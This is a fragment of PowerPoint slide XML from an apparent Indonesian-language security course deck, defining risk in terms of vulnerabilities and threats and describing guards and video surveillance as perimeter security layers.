              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditimbulkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Ketika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dihitung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemungkinan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dieksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aktor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dampak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditimbulkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>eksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berhasil</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17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="281485990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Penjaga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> dan Kamera</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pengawasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merupakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lapisan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kedua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dirancang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketahanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gerbang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> perimeter. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pengawasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>difokuskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada area perimeter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> zona </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Petugas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manusia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bersenjata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bersenjata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditempatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>di</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>depan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sekitar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melindunginya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memantau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemeriksaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kritis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memverifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>identifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengizinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melarang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencatat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peristiwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pencegah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> visual dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengetahuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>intuisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>potensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelanggaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kehadiran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penjaga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terlihat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>efektif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>deteksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>intrusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mekanisme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pencegahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>efektif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>namun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga mahal. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menempatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>petugas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> zona </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertentu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>izin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesuai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pelatihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>petugas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pengawasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> video </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>murah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengawasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daripada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menempatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penjaga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terpisah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pintu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gerbang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> zona, </a:t>
            </a:r>
            <a:r>
